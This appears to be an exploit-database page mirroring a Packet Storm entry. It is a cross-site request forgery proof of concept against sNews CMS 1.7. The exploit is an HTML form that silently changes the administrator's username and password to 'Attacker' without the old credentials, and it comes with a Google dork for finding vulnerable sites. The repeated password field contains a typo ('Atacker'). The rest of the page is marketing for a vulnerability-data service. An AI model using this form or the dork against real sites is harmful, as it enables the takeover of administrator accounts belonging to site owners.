Lucene search
K

sNews CMS 1.7 Cross Site Request Forgery

🗓️ 04 Nov 2016 00:00:00Reported by Amir.ghtType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 39 Views

SNews CMS 1.7 Cross Site Request Forgery exploit to change admin username and passwor

Code
`# Exploit Title : Snews CMS Cross Site Request Forgery  
# Author : Ashiyane Digital Security Team  
# Google Dork : "This site is powered by sNews"  
# Date : 1/11/2016  
# Type : webapps  
# Platform : PHP  
# Vendor Homepage : http://snewscms.com/  
# Software link : http://snewscms.com/download/snews1.7.1.zip  
# Version : 1.7(latest)  
#######################################################3  
Change Username and Password of admin  
We Dont need old user name and old password  
<html>  
<!-- CSRF PoC -->  
<body>  
<form name="form0"  
action="http://localhost/?action=process&task=changeup" method="POST">  
<input type="hidden" name="uname" value="Attacker" /> // new username  
<input type="hidden" name="pass1" value="Attacker" /> //new password  
<input type="hidden" name="pass2" value="Atacker" />// repeat new password  
<input type="hidden" name="task" value="changeup" />  
<input type="submit" name="submit_pass" value="Save" />  
</form>  
</body>  
</html>  
####################################################  
######### exploit by: Amir.ght #####################  
####################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation